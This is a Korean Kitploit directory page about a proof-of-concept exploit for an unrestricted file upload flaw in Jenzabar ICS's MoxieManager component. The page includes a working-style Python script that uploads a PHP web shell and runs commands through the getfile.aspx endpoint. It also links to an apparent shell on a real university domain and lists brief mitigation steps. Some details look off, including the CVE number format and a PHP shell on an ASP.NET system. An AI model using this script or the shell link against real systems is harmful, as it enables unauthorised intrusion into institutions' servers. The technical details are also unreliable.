Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (치명적) Jenzabar ICS + MoxieManager 잠재적 RCE | Kitploit
도구/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (치명적) Jenzabar ICS + MoxieManager 잠재적 RCE

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (치명적) Jenzabar ICS + MoxieManager 잠재적 RCE

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS 영향 영향 대상 CVE-2026-30-03 9.8 (치명적) 잠재적 RCE Jenzabar ICS + MoxieManager

Jenzabar ICS 시스템에서 사용되는 MoxieManager 구성 요소의 취약점으로 인해 파일 업로드가 부적절하게 처리될 수 있으며, 특정 조건에서 해당 파일이 공개적으로 접근 가능해져 잠재적으로 원격 코드 실행(RCE)으로 이어질 수 있습니다. 기술 설명

문제는 다음으로 인해 발생합니다:

업로드된 파일에 대한 적절한 검증 부족

공개 엔드포인트를 통한 파일 노출 가능성:

/ICS/staticpages/getfile.aspx

엔드포인트의 인증 제어 불일치:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

특정 시나리오에서 업로드된 파일은 접근 가능한 디렉터리에 저장된 후 검색될 수 있습니다.

영향 임의 파일 업로드 민감한 콘텐츠 노출 잠재적 원격 코드 실행(서버 구성에 따라 다름) 시스템 전체 손상

분류 CVSS v3.1: 9.8 (치명적) 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: 제한 없는 파일 업로드 CWE-284: 부적절한 접근 제어

PoC 익스플로잇

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

영향을 받는 시스템 (33개 이상 확인됨)

수정 방법 즉시 조치 (완화):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. getfile.aspx 제한:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. MoxieManager 업로드 비활성화

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

도구 다운로드